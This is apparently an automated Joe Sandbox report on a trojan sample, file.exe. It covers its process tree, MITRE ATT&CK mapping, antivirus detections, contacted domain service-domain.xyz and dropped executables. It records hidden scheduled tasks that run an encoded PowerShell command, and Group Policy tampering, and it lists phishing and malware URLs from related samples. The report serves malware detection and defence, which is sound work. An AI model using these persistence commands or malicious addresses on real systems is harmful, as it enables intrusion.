Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_00414B04

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies Group Policy settings
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		11
Scheduled Task/Job		11
Process Injection		2
Masquerading		OS Credential Dumping121
Security Software Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts21
Command and Scripting Interpreter		Boot or Logon Initialization Scripts11
Scheduled Task/Job		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts11
Scheduled Task/Job		Logon Script (Windows)Logon Script (Windows)1
Modify Registry		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Native API		Logon Script (Mac)Logon Script (Mac)41
Virtualization/Sandbox Evasion		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud Accounts2
PowerShell		Network Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets4
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common11
Deobfuscate/Decode Files or Information		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Obfuscated Files or Information		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
File Deletion		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 753408 Sample: file.exe Startdate: 24/11/2022 Architecture: WINDOWS Score: 100 93 service-domain.xyz 2->93 95 clients2.google.com 2->95 97 clients.l.google.com 2->97 109 Multi AV Scanner detection for domain / URL 2->109 111 Antivirus detection for dropped file 2->111 113 Multi AV Scanner detection for dropped file 2->113 115 5 other signatures 2->115 12 file.exe 7 2->12         started        15 pdyDoIJ.exe 1 8 2->15         started        18 powershell.exe 12 2->18         started        20 gpscript.exe 2->20         started        signatures3 process4 file5 89 C:\Users\user\AppData\Local\...\Install.exe, PE32 12->89 dropped 22 Install.exe 4 12->22         started        91 C:\Windows\Temp\...\RFYnzaH.exe, PE32 15->91 dropped 123 Antivirus detection for dropped file 15->123 125 Multi AV Scanner detection for dropped file 15->125 127 Very long command line found 15->127 129 Uses cmd line tools excessively to alter registry or file data 15->129 26 powershell.exe 9 15->26         started        28 gpupdate.exe 1 18->28         started        30 conhost.exe 18->30         started        signatures6 process7 file8 87 C:\Users\user\AppData\Local\...\Install.exe, PE32 22->87 dropped 117 Multi AV Scanner detection for dropped file 22->117 32 Install.exe 10 22->32         started        119 Uses cmd line tools excessively to alter registry or file data 26->119 36 cmd.exe 26->36         started        38 conhost.exe 26->38         started        40 reg.exe 26->40         started        44 9 other processes 26->44 42 conhost.exe 28->42         started        signatures9 process10 file11 83 C:\Users\user\AppData\Local\...\pdyDoIJ.exe, PE32 32->83 dropped 85 C:\Windows\System32behaviorgraphroupPolicy\gpt.ini, ASCII 32->85 dropped 99 Antivirus detection for dropped file 32->99 101 Multi AV Scanner detection for dropped file 32->101 103 Uses schtasks.exe or at.exe to add and modify task schedules 32->103 105 Modifies Group Policy settings 32->105 46 forfiles.exe 1 32->46         started        48 forfiles.exe 1 32->48         started        50 schtasks.exe 2 32->50         started        54 3 other processes 32->54 107 Uses cmd line tools excessively to alter registry or file data 36->107 52 reg.exe 36->52         started        signatures12 process13 process14 56 cmd.exe 1 46->56         started        59 conhost.exe 46->59         started        61 cmd.exe 1 48->61         started        63 conhost.exe 48->63         started        65 conhost.exe 50->65         started        67 conhost.exe 54->67         started        69 conhost.exe 54->69         started        71 conhost.exe 54->71         started        signatures15 121 Uses cmd line tools excessively to alter registry or file data 56->121 73 reg.exe 1 1 56->73         started        75 reg.exe 1 56->75         started        77 reg.exe 1 1 61->77         started        79 reg.exe 1 61->79         started        process16 process17 81 Conhost.exe 73->81         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe39%ReversingLabsWin32.Trojan.Jaik

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe100%AviraHEUR/AGEN.1250601
C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe100%AviraHEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe100%AviraHEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe41%ReversingLabsWin32.Trojan.Jaik
C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe51%ReversingLabsWin32.Trojan.Zusy
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe51%ReversingLabsWin32.Trojan.Zusy
C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe51%ReversingLabsWin32.Trojan.Zusy

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.0.Install.exe.3f0000.0.unpack100%AviraHEUR/AGEN.1250601Download File
37.2.pdyDoIJ.exe.a0000.0.unpack100%AviraHEUR/AGEN.1250601Download File
37.0.pdyDoIJ.exe.a0000.0.unpack100%AviraHEUR/AGEN.1250601Download File
2.2.Install.exe.3f0000.0.unpack100%AviraHEUR/AGEN.1250601Download File

Domains

SourceDetectionScannerLabelLink
service-domain.xyz11%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.microsoft.co0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand0%URL Reputationsafe
http://crl.micr0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
service-domain.xyz
3.80.150.121
truetrueunknown
clients.l.google.com
142.250.203.110
truefalse
    		high
    clients2.google.com
    		unknown
    		unknownfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://go.microsoft.copowershell.exe, 00000011.00000002.413168251.000001A8F993B000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://oneget.orgXpowershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://oneget.orgformat.ps1xmlagement.dll2040.missionsandpowershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.micrpowershell.exe, 00000011.00000002.403370580.000001A8F7925000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.303899135.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.447061574.0000000002F01000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://oneget.orgpowershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:753408
                  Start date and time:2022-11-24 19:13:21 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 10m 58s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:file.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:59
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@89/15@2/0
                  EGA Information:
                  • Successful, ratio: 40%
                  HDC Information:
                  • Successful, ratio: 100% (good quality ratio 97.7%)
                  • Quality average: 84.6%
                  • Quality standard deviation: 22.8%
                  HCA Information:
                  • Successful, ratio: 65%
                  • Number of executed functions: 192
                  • Number of non-executed functions: 27
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 172.217.168.74, 142.250.203.106, 216.58.215.234, 172.217.168.10, 172.217.168.42
                  • Excluded domains from analysis (whitelisted): www.bing.com, files.testupdate.info, fs.microsoft.com, ocsp.digicert.com, login.live.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www.testupdate.info, www.googleapis.com, api5.check-data.xyz
                  • Execution Graph export aborted for target powershell.exe, PID 6060 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  19:15:14Task SchedulerRun new task: gbyyEslRl path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  19:15:35Task SchedulerRun new task: bbsSMGQQDZvgelOgpL path: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe s>DC /site_id 525403 /S
                  19:16:48Task SchedulerRun new task: gwDFsvbzF path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  19:17:03Task SchedulerRun new task: agQaaMVMfgqpSGSbr path: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe s>mY /site_id 525403 /S
                  19:17:08Task SchedulerRun new task: AxVCmvJfwAUUq2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\wizgoPrNSfGOJXVB\oJRrLYd.wsf"

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  clients.l.google.comhttps://us-west-2.protection.sophos.com/?d=kole.go.ug&u=aHR0cDovL3J3Lmx0LmtvbGUuZ28udWcvLj9RUVEjLlpYSnBZMnRoTG1obGQybDBkRUJqWTJOMUxtTmg=&i=NTdiNzc4NmM1YzQ0ZjgwZjY1NTU5ZDkz&t=cUoyYXhTeEF1SlZLd2ZBcU1iNEF0WlhRMkovT3B2MVNkWkIxY0UzTkFJQT0=&h=22263e48e09f486e85f2d65fd4458ef0&s=AVNPUEhUT0NFTkNSWVBUSVYOIq_c2CCy54p_h0M5Ykgbq3jUSvRBBh4rvmKMTzlBnmfvXGKYLh3GNNBzTo68LUtB-AoTdwEvNdQgz9yBqIR9vFjk0QnDjj87NtnFaI52pgGet hashmaliciousBrowse
                  • 142.250.203.110
                  Thomas Anderson 9562 Cgs.htmGet hashmaliciousBrowse
                  • 142.250.203.110
                  https://acecleaningcompanyltd-my.sharepoint.com/:f:/g/personal/gareth_acecleaningcompany_co_uk/EqK_EUhvcj9EqL8zaf1xU40BcaryjM91jBjbqjyStHZsjg?e=WEogXHGet hashmaliciousBrowse
                  • 142.250.203.110
                  https://mailsrver.contributes.rest/databases.html?home=mmcdonald@glm.caGet hashmaliciousBrowse
                  • 142.250.203.110
                  http://ductrelendolite.ga/page-52694/Get hashmaliciousBrowse
                  • 142.250.203.110
                  http://80.66.75.27/a-Uyjiqnd.exeGet hashmaliciousBrowse
                  • 142.250.203.110
                  https://www.cexpr.es/c?n=3230005694527383Get hashmaliciousBrowse
                  • 142.250.186.174
                  https://www.cexpr.es/c?n=3230005694527383Get hashmaliciousBrowse
                  • 172.217.18.14
                  https://mailsrver.contributes.rest/databases.html?home=test.test@bbc.co.ukGet hashmaliciousBrowse
                  • 142.250.203.110
                  http://vps-c707f06e.vps.ovh.caGet hashmaliciousBrowse
                  • 142.250.181.238
                  http://reschedule-mydelivery.comGet hashmaliciousBrowse
                  • 142.250.203.110
                  https://haveaportfoliolu-my.sharepoint.com/:o:/g/personal/claude_have_haps_lu/EmYTSKdEA4JPoGXmtWKNKngBR1n65V6olaZtjfSxYoNH3Q?e=5%3acOFCbo&at=9Get hashmaliciousBrowse
                  • 142.250.203.110
                  https://www.taskade.com/d/28J2734nwU2nEwU9?share=view&view=WgHdcBXQ2NCoV5LY&as=listGet hashmaliciousBrowse
                  • 142.250.203.110
                  https://4293857.debournigerialtd.com/#YWxleGFuZGVyLmhhZ2VuQG1hbi1lcy5jb20=Get hashmaliciousBrowse
                  • 142.250.203.110
                  https://d10sfr04.na1.hubspotlinks.com/Ctc/ZU+113/d10sfR04/VVyy_r2MfJLNN4j8c4w6LHWBW7TctdS4SKFxDN5QLhT53q905V1-WJV7CgSfgW30p7nV4bgs7WW512fYZ4fD_1mW7MK0fG1l8bNQN3nL2gJ47y9VW7wW5l995Mk2PW4mKQKg3rWR_0W80RHqb3s-lwNW1rpP_M3nlkR3Mzb6_rMpV3DMV2mthwgswlN379wTWlGP6xW5frLMQ455vKMN4phng0yQG_wVWMjJm420N7gW5bqz517BQZp6W1ztgFM99H6W0W1sWh1h8Bk6GhV8CsVx2Z98X4W87pz-G5nwf-nVxc6fk5q9D81W5H-Hzp8h5YqTW11mRjz3lSTDKW5n2JsN7459TVW2f7j6F2nl6dw3dqZ1Get hashmaliciousBrowse
                  • 142.250.203.110
                  file.exeGet hashmaliciousBrowse
                  • 142.250.203.110
                  https://app.pipefy.com/public/form/rRoom7uKGet hashmaliciousBrowse
                  • 142.250.203.110
                  http://centurionbusinesses.com/mGet hashmaliciousBrowse
                  • 142.250.203.110
                  https://losdigital-my.sharepoint.com/:o:/g/personal/tatyana_losdigital_no/Ej7WHSDAJ3JDsnnoxtswpcYBsDBKe33RmtGrkS5VXoNg-w?e=GmHMbZGet hashmaliciousBrowse
                  • 142.250.203.110
                  login-srvcs000000107637.htmlGet hashmaliciousBrowse
                  • 172.217.18.110
                  service-domain.xyzfile.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121
                  file.exeGet hashmaliciousBrowse
                  • 3.80.150.121

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exefile.exeGet hashmaliciousBrowse
                    C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exefile.exeGet hashmaliciousBrowse
                      file.exeGet hashmaliciousBrowse
                        file.exeGet hashmaliciousBrowse
                          file.exeGet hashmaliciousBrowse
                            file.exeGet hashmaliciousBrowse
                              C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exefile.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.9260988789684415
                                        Encrypted:false
                                        SSDEEP:3:Nlllulb/lj:NllUb/l
                                        MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                        SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                        SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                        SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                        Malicious:false
                                        Preview:@...e................................................@..........

                                        C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):6571809
                                        Entropy (8bit):7.996003603865134
                                        Encrypted:true
                                        SSDEEP:196608:91OAmLWOhmdNwFc7/hpQd4CYYlW7bWzg+aNxKpzDkp5x4WM:3OvWOkz3Qd4joeYSxKpzDo5x4WM
                                        MD5:65D01849A2062434BCE6C580CDA92A1D
                                        SHA1:8BEF36557E25532961724539E4DDBB4D11970627
                                        SHA-256:8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4
                                        SHA-512:0EECF3824418C210DB4257EA5F2852BB32B02C5B3CE0FE62F841F71E10EC81482D889880EE42438B3EF2DC39682BDA2CD9435DD08CF21879D92148A9C7591EBE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 41%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\config.txt

                                        Download File
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):866146
                                        Entropy (8bit):7.999783652399914
                                        Encrypted:true
                                        SSDEEP:24576:4YGhUN5iugAVdfj07IcTW6rIwX2N8m/ZQq2fd7w+IxulInxM:4YGhPufVdfjgIUWmIwX2N8SKPd86UM
                                        MD5:927A00BC73AD358930C1BCA86D1F78AE
                                        SHA1:AAED44842119FF3287961E29E9A7CE38B5C92DC3
                                        SHA-256:526184BCF9AB17BEF2C67600F9D8E7E7CE4DDC4D4241BECC5F724E832AFB538D
                                        SHA-512:E952277890D0E02B56836BFCE7BC9427CF8616D06E4EBDE2F07EAE9899E7CD837BEADD93D6919627492B44EF91E7F2E08F37597840B2801AEA5313423CEF7932
                                        Malicious:false
                                        Preview:.E..{..X..D.+.i.h...v...4....F.KvYl.\.by......F.....<..@M3:s.....t...?.. ..y..9.S`j.Cc.{H..t.Uo....1C.K..o....2.)gJ/39...V.Y.Q.E...QN?.^.|.D"Kiw|...M....[..'].j..^.w...6.#../.[:L.M+n.M..)......M&.{E........T...\.qK.$.zQ..W..../.O.y...-....x......|....cp.~%.5...K.+0!..X.?#|..T7........e.l.i.@].XJ.f3D..a#..I......M.MD......:kl_T.<..h.O..........+.:-A.u.`..l......b....Ol....e...m...Ka.5..N.e..?.!....0Zs..Kl.<.....D`.\{.9.a..A..yJ..}b..Q2X.......zd..k(..E....q.$I.g...u..^X.*t..{{g....{.u..I...]/D.WA......q..\8k.}...G..2....zK.......T...C~!{.G.y...]j....#..fV..T9hm29....i...@Y...1r..M ..1j..b..3.%.d....=.G/.8%a...S..qz.T6S5G..X..iF".ar..g.~..n..|...N..dz..........r.>d*..3..pg^..q.2H.H.. .o....#xV..e.[>...PEUat[.a;.U...+.1(....[t.d.oy<.t.....a.m..&.%.n..........>..x.....4_V.2U.qU=c.N.L...cg.G.<..u=&321G.....k..3.O.riv.....T;K.. .?.V....Pw.[.....U..D`T.....kvc.....u .....j>&.....B.{.k.....\.2..u.-..P.:.Z...+F..>yI+b...C..X16...C.....#..pL...2.o...

                                        C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7104512
                                        Entropy (8bit):7.680459343919421
                                        Encrypted:false
                                        SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                                        MD5:893793FBD70BA4A92919D09205D6C9C1
                                        SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                                        SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                                        SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 51%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7104512
                                        Entropy (8bit):7.680459343919421
                                        Encrypted:false
                                        SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                                        MD5:893793FBD70BA4A92919D09205D6C9C1
                                        SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                                        SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                                        SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                                        Malicious:true
